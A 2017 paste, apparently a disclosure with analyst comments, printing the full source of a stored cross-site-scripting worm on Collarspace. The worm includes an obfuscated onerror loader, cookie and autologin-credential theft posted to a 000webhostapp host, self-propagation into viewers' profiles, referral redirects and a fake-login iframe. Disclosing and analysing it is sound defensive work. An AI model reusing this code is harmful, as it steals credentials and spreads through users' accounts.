
CS-Is-A-Terrible-Website

a guest
Sep 18th, 2017
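  1. I discovered this on the collarspace website on 17Sep2017. This shit is slowly infecting CS profiles because the site doesn't filter code from user profiles (in other words a stored cross-site-scripting hole: markup saved in one profile runs as script in the browser of everyone who views that profile). Apparently as of 18Sep2017 the person updated the code, so this is the second version I've noticed: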
  2.  
  3. --------
  4.  
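  5. Infected profiles get the following hidden <img> appended to the profile text. Its src ("a.b") cannot load, so the onerror handler runs: it fetches hax.txt from the 000webhostapp host and evals the response. The split strings ("ev"+"al", "onre"+"adystat"+"echange") look like an attempt to get past keyword filtering: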
  6.  
  7. <img style="display:none" auto src="a.b" onerror='var x = new XMLHttpRequest();x["onre"+"adystat"+"echange"]=function(){if (x.readyState==4&&x.status==200)window["ev"+"al"](x.responseText);};x.open("GET", "https://collarspace.000webhostapp.com/<font size='4' color='red'><b>hax</b></font>.txt",true);x.send();'/>
  8.  
  9.  
  10. ---------
  11.  
  12. hax.txt contents:
  13.  
  14.  
  // Analyst note: stage-1 loader (hax.txt), evaluated by the profile's onerror handler.
  // If the page has no global `$`, a <script> element for jQuery is appended to <head>
  // and doStuff runs from its onload; otherwise doStuff runs straight away.
  // The jQuery URL is plain http, unversioned ("latest") and carries no integrity check.
  15. if (!window.$) {
  16. var scr = document.createElement('script');
  17. scr.setAttribute("src", "http://code.jquery.com/jquery-latest.min.js");
  18. scr.onload = doStuff;
  19. var head = document.getElementsByTagName('head')[0];
  20. head.appendChild(scr);
  21. } else {
  22. doStuff();
  23. }
  24.  
  // Analyst note: stage 1 hands over to stage 2 by requesting actualhax.js from the
  // 000webhostapp host. `cache: false` asks jQuery to bypass the browser cache, so each
  // page view picks up whatever the host currently serves.
  // NOTE(review): `eval` sits in a second-argument slot that $.ajax(settings) does not
  // use as a callback as far as I know; the response is presumably executed by jQuery's
  // own handling of responses it identifies as script — confirm against the jQuery
  // version that is actually loaded.
  // Indicator visible on this page: requests to collarspace.000webhostapp.com/actualhax.js
  25. function doStuff() {
  26. $.ajax({url: "http://collarspace.000webhostapp.com/actualhax.js", cache: false},eval);
  27. }
  28.  
  29.  
  30. --------
  31.  
  32. actualhax.js contents:
  33.  
  34.  
  35. /*jshint -W116 */
  36. /* jshint esnext: true, browser: true, jquery: true */
  37.  
  // Analyst note: stage-2 entry point (actualhax.js). Same bootstrap as hax.txt:
  // load jQuery from code.jquery.com over plain http when `$` is missing, then call
  // doStuff (the function declared further down in this file); otherwise call it directly.
  38. if (!window.$) {
  39. var scr = document.createElement('script');
  40. scr.setAttribute('src', 'http://code.jquery.com/jquery-latest.min.js');
  41. scr.onload = doStuff;
  42. var head = document.getElementsByTagName('head')[0];
  43. head.appendChild(scr);
  44. } else {
  45. doStuff();
  46. }
  47.  
  // Analyst note: builds an object of cookie name -> URI-decoded value from
  // document.cookie, leaving out any cookie whose name starts with "ASPSESSION".
  // The loop starts at index 1, so the first entry of document.cookie is never read.
  // Only script-readable cookies can appear here: a cookie set with the HttpOnly
  // attribute is absent from document.cookie and therefore from this object.
  // doStuff later posts the returned object to cookies.php on the 000webhostapp host.
  48. function getCookies() {
  49. var cookies = {};
  50. var theCookies = document.cookie.split(';');
  51. for (var i = 1; i < theCookies.length; i++) {
  // Group 1 is the cookie name (leading whitespace skipped), group 2 the raw value.
  52. var mat = theCookies[i].match(/\s*([^=]+)=?(.*)/);
  53. if (!mat[1].match(/^ASPSESSION/))
  54. cookies[mat[1]] = decodeURIComponent(mat[2]);
  55. }
  56. return cookies;
  57. }
  58.  
  // Analyst note: installs jQuery.base64 = { decode, encode, VERSION }, a self-contained
  // base64 codec over the standard alphabet. Nothing here touches the network or the DOM.
  // In this file the only use is $.base64.decode() in doStuff, applied to the `p=` value
  // taken from an "autologin" link.
  59. function loadBase64() {
  // The arrow function takes no parameter, so the jQuery argument passed at the end of
  // the IIFE is unused.
  60. jQuery.base64 = ((() => {
  61. var _PADCHAR = "=",
  62. _ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
  63. _VERSION = "1.0";
  64.  
  // Returns the 6-bit value of the character at s[i]; throws the string
  // "Cannot decode base64" when the character is not in the alphabet.
  65. function _getbyte64(s, i) {
  66. var idx = _ALPHA.indexOf(s.charAt(i));
  67. if (idx === -1) throw "Cannot decode base64";
  68. return idx;
  69. }
  70.  
  // Decodes base64 text into a string with one character per decoded byte.
  // Throws "Cannot decode base64" when the length is not a multiple of 4 or a
  // character is outside the alphabet. Note that s.length is read before the
  // String(s) coercion.
  71. function _decode(s) {
  72. var pads = 0,
  73. i, b10, imax = s.length,
  74. x = [];
  75. s = String(s);
  76. if (imax === 0) return s;
  77. if (imax % 4 !== 0) throw "Cannot decode base64";
  // Count trailing '=' (1 or 2); a padded final group is excluded from the main
  // loop and handled by the switch below.
  78. if (s.charAt(imax - 1) === _PADCHAR) {
  79. pads = 1;
  80. if (s.charAt(imax - 2) === _PADCHAR) {
  81. pads = 2;
  82. }
  83. imax -= 4;
  84. }
  // Each full group of four characters yields 24 bits, i.e. three bytes.
  85. for (i = 0; i < imax; i += 4) {
  86. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12) | (_getbyte64(s, i + 2) << 6) | _getbyte64(s, i + 3);
  87. x.push(String.fromCharCode(b10 >> 16, (b10 >> 8) & 255, b10 & 255));
  88. }
  // One pad character -> two bytes from the last group; two pads -> one byte.
  89. switch (pads) {
  90. case 1:
  91. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12) | (_getbyte64(s, i + 2) << 6);
  92. x.push(String.fromCharCode(b10 >> 16, (b10 >> 8) & 255));
  93. break;
  94. case 2:
  95. b10 = (_getbyte64(s, i) << 18) | (_getbyte64(s, i + 1) << 12);
  96. x.push(String.fromCharCode(b10 >> 16));
  97. break;
  98. }
  99. return x.join("");
  100. }
  101.  
  // Returns the char code at s[i]; throws a string when the code is above 255,
  // i.e. the input is not a byte string.
  102. function _getbyte(s, i) {
  103. var x = s.charCodeAt(i);
  104. if (x > 255) {
  105. throw "INVALID_CHARACTER_ERR: DOM Exception 5";
  106. }
  107. return x;
  108. }
  109.  
  // Encodes a byte string as base64 with '=' padding. Requires exactly one
  // argument and throws a string otherwise.
  110. function _encode(s) {
  111. if (arguments.length !== 1) {
  112. throw "SyntaxError: exactly one argument required";
  113. }
  114. s = String(s);
  115. var i, b10, x = [],
  116. imax = s.length - s.length % 3;
  117. if (s.length === 0) return s;
  // Full three-byte groups become four output characters.
  118. for (i = 0; i < imax; i += 3) {
  119. b10 = (_getbyte(s, i) << 16) | (_getbyte(s, i + 1) << 8) | _getbyte(s, i + 2);
  120. x.push(_ALPHA.charAt(b10 >> 18));
  121. x.push(_ALPHA.charAt((b10 >> 12) & 63));
  122. x.push(_ALPHA.charAt((b10 >> 6) & 63));
  123. x.push(_ALPHA.charAt(b10 & 63));
  124. }
  // One or two leftover bytes are emitted with two or one pad characters.
  125. switch (s.length - imax) {
  126. case 1:
  127. b10 = _getbyte(s, i) << 16;
  128. x.push(_ALPHA.charAt(b10 >> 18) + _ALPHA.charAt((b10 >> 12) & 63) + _PADCHAR + _PADCHAR);
  129. break;
  130. case 2:
  131. b10 = (_getbyte(s, i) << 16) | (_getbyte(s, i + 1) << 8);
  132. x.push(_ALPHA.charAt(b10 >> 18) + _ALPHA.charAt((b10 >> 12) & 63) + _ALPHA.charAt((b10 >> 6) & 63) + _PADCHAR);
  133. break;
  134. }
  135. return x.join("");
  136. }
  137. return {
  138. decode: _decode,
  139. encode: _encode,
  140. VERSION: _VERSION
  141. };
  142. })(jQuery));
  143. }
  144.  
  // Analyst note: registers a click handler on every <a>. On the first click it
  // stretches <body> to 100% with overflow hidden, prepends a full-size iframe and points
  // it at login.php on the 000webhostapp host, passing the current page URL in the `url`
  // query parameter; `return false` cancels the link the user actually clicked.
  // Presumably login.php is a look-alike login form — the page does not show it.
  // In this version the only calls to doLogin are inside the commented-out block in
  // doStuff, so the function is defined but not reached.
  145. function doLogin() {
  // `done` limits the overlay to a single activation per page load.
  146. let done = false;
  147. $('a').click(() => {
  148. if (done) return;
  149. done = true;
  150. const domain = 'https://collarspace.000webhostapp.com/';
  151. console.log('CS-MBS - Login');
  152. const props = {
  153. width: '100%',
  154. height: '100%',
  155. overflow: 'hidden',
  156. };
  157. const iframe = $('<iframe>').css(props);
  158. $(document.body).css(props).prepend(iframe);
  159. const href = document.location.href;
  160. iframe.attr('src', domain + 'login.php?url=' + encodeURIComponent(href));
  161. return false;
  162. });
  163. }
  164.  
  // Analyst note: the self-propagation step. It loads the site's own
  // /processor.asp?bhcp=1 in a hidden iframe; because that page is same-origin, the
  // script can read and change its form. When the page contains #p_desc (presumably the
  // profile-description field — confirm), the <img onerror> loader in `hax` is appended
  // to the field's value and form1 is submitted with its onsubmit handler cleared.
  // The submit goes out from the viewer's own session, so server-side it looks like an
  // ordinary profile edit by that user.
  // Markers a responder can use, all visible here: the stored profile text contains the
  // host string tested by the regex below, and the browser holds an LGGI cookie equal to
  // the user id.
  // Mitigation belongs on the server: encode or sanitize profile HTML on output so that
  // event-handler attributes such as onerror are never emitted.
  165. function infectProfile(id) {
  166. const hax = `\n\n<img style="display:none" auto src="a.b" onerror='var x = new XMLHttpRequest();x["onre"+"adystat"+"echange"]=function(){if (x.readyState==4&&x.status==200)window["ev"+"al"](x.responseText);};x.open("GET", "https://collarspace.000webhostapp.com/hax.txt",true);x.send();'/>`
  167. const proc = $('<iframe/>').css('display', 'none').appendTo(document.body);
  168. proc.load(() => {
  169. const ta = $('#p_desc', proc.contents());
  // Nothing to do when the loaded page has no #p_desc element.
  170. if (!ta.length) return;
  // Set before the content check, so the cookie is written even when the field
  // already contains the host string.
  171. document.cookie = 'LGGI=' + id + '; path=/';
  172. let val = ta.val();
  // The '.' characters in this regex are unescaped and match any character.
  173. if (!val.match(/collarspace.000webhostapp.com/)) {
  174. ta.val(val += hax);
  175. const form = $('form[name=form1]', proc.contents());
  // Clearing onsubmit bypasses whatever client-side handler the form carries.
  176. form[0].onsubmit = null;
  177. form.submit();
  178. }
  179. });
  180. proc.attr('src', '/processor.asp?bhcp=1');
  181. }
  182.  
  // Analyst note: expires the named cookie for path "/" by rewriting it with an empty
  // value and an expiry date in 1970. Used only by logout() in this file.
  183. function delete_cookie(name) {
  184. document.cookie = name + '=; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
  185. }
  186.  
  // Analyst note: removes the `access`, `id` and `g` cookies plus every cookie whose
  // name starts with "ASPSESSION", which presumably ends the viewer's session on the
  // site. doStuff calls it when no `id` cookie is present and for one hard-coded user id.
  // As in getCookies, the loop starts at index 1, so the first entry of document.cookie
  // is not examined. `cookies` is never filled, so the return value is always {}.
  // A user-visible symptom worth correlating in support tickets: unexpected logouts.
  187. function logout() {
  188. console.log('Logging out');
  189. delete_cookie('access');
  190. delete_cookie('id');
  191. delete_cookie('g');
  192. var cookies = {};
  193. var theCookies = document.cookie.split(';');
  194. for (var i = 1; i < theCookies.length; i++) {
  195. var mat = theCookies[i].match(/\s*([^=]+)=?(.*)/);
  196. if (mat[1].match(/^ASPSESSION/))
  197. delete_cookie(mat[1]);
  198. }
  199. return cookies;
  200. }
  201.  
  202. // document.cookie = 'username=Test; path=/';
  // Analyst note: main routine of actualhax.js. In order it
  //   1. removes the injected <img src="a.b"> from the rendered page,
  //   2. schedules referral traffic to g2a.com after five seconds,
  //   3. logs the viewer out when no `id` cookie exists,
  //   4. calls infectProfile for a viewer not yet marked by the LGGI cookie,
  //   5. on DOM ready, posts the script-readable cookies, the page URL and the decoded
  //      autologin value to cookies.php on the 000webhostapp host,
  //   6. rewrites the text of elements carrying `fake` / `lerep` attributes.
  // Indicators visible in this block: POSTs to collarspace.000webhostapp.com/cookies.php,
  // requests to g2a.com/r/legg, cookies LGGI / G2A / G2APU on the site's origin, and the
  // globals window.LeGG and window.LGGI.
  // Defensive levers: output-encode profile HTML, mark session cookies HttpOnly, and use a
  // Content-Security-Policy that restricts where scripts load from and where the page may
  // send requests.
  203. function doStuff() {
  204. loadBase64();
  // The injected element is stashed in window.LGGI and removed from the DOM, so it is
  // no longer in the live document once this has run.
  205. const infecter = $('[src="a.b"]');
  206. window.LGGI = infecter[0];
  207. infecter.remove();
  208. const domain = 'https://collarspace.000webhostapp.com/';
  // Replacement texts, looked up by the value of an element's `lerep` attribute below.
  209. const replacings = {
  210. hypnosisDomme: 'Send me "Kiwi " if you submit to me. Send "Radio " otherwise',
  211. SimplyTheBest329: 'Are you sure?',
  212. };
  213. //const forceLogin = ['nataliewood', 'iowawarden', 'msTowned', 'alliepre'];
  // Run-once guard: a second evaluation on the same page returns here.
  214. if (window.LeGG) return;
  215. window.LeGG = true;
  216. //console.log('CS-MBS Launched');
  217. var cookies = getCookies();
  // Referral abuse: unless already marked by the G2A / G2APU cookies, load g2a.com/r/legg
  // in a hidden iframe and redirect the whole page to it once. Presumably /r/legg is the
  // author's referral link. The checks use the `cookies` snapshot taken above.
  218. setTimeout(() => {
  219. if (cookies.G2A != 'legg') {
  220. $('<iframe/>', {
  221. src: 'http://www.g2a.com/r/legg',
  222. style: 'display:none',
  223. load: function () {
  224. $(this).remove();
  225. document.cookie = 'G2A=legg; path=/';
  226. }
  227. }).appendTo('body');
  228. }
  229. if (cookies.G2APU != 'legg') {
  230. document.cookie = 'G2APU=legg; path=/';
  231. document.location = 'http://g2a.com/r/legg';
  232. }
  233. }, 5000);
  234. var id = cookies.id;
  // No readable `id` cookie: clear the session cookies and stop.
  235. if (!id) return logout();
  // replace() with a string pattern removes only the first '+'.
  236. id = id.replace('+', '');
  237. id = id.toLowerCase();
  238. window.LeGG = id;
  // LGGI is the marker cookie written by infectProfile.
  239. if (cookies.LGGI != id) infectProfile(id);
  240. $(document).ready(function () {
  // Takes the first link whose href contains "autologin" and base64-decodes its `p=`
  // value. The script stores it under the key `pass`; presumably it is the account's
  // autologin credential. It is collectable here only because the site places it in a
  // link that page script can read.
  241. let pass = $("a[href*=autologin]")[0];
  242. pass = pass && pass.href.match(/p=([\w=]+)/);
  243. pass = pass && pass[1];
  244. if (pass) {
  245. pass = $.base64.decode(pass);
  // Optional hook: when window.LeGGBP exists and returns a truthy value for the decoded
  // string, the rest of this handler is skipped. It is not defined in this file.
  246. if (window.LeGGBP && window.LeGGBP(pass)) return;
  247. cookies.pass = pass;
  248. }
  249. if (id == "wantingparents") logout();
  // Exfiltration: cookie object, decoded `pass` (when found) and the current URL are
  // sent as form fields in a cross-origin POST.
  250. cookies.location = document.location.href;
  251. $.post(domain + 'cookies.php', cookies);
  // Disabled in this version: server-triggered ("WeakUpdate") calls to doLogin, either
  // for the ids in forceLogin or for roughly a quarter of other users.
  252. /*if (cookies.access && cookies.LGGL == id) {
  253. cookies.location = document.location.href;
  254. $.post(domain + 'cookies.php', cookies, (data) => {
  255. if (data.match(/WeakUpdate/)) {
  256. if (forceLogin.find((n) => n == id)) {
  257. doLogin();
  258. } else if (Math.random() <= 0.25) {
  259. doLogin();
  260. }
  261. }
  262. });
  263. } else if (cookies.access) {
  264. document.cookie = 'LGGL=' + id + '; path=/';
  265. }*/
  // Content spoofing: an element with a `fake` attribute shows its `unfake` text to the
  // user named in `from`, and its `fake` text to everyone else unless that text is 'Kiwi'.
  266. $('[fake]').each(function (i, ele) {
  267. ele = $(ele);
  268. var from = ele.attr('from');
  269. if (from && from.toLowerCase() == id.toLowerCase()) {
  270. if (ele.attr('unfake') !== undefined) {
  271. ele.text(ele.attr('unfake'));
  272. }
  273. } else if (ele.attr('fake') != 'Kiwi') {
  274. ele.text(ele.attr('fake'));
  275. }
  276. });
  // Elements with a `lerep` attribute get the matching text from `replacings`, if any.
  277. $('[lerep]').each(function (i, ele) {
  278. ele = $(ele);
  279. var rep = ele.attr('lerep');
  280. rep = rep && replacings[rep];
  281. if (rep) ele.text(rep);
  282. });
  283. });
  284. }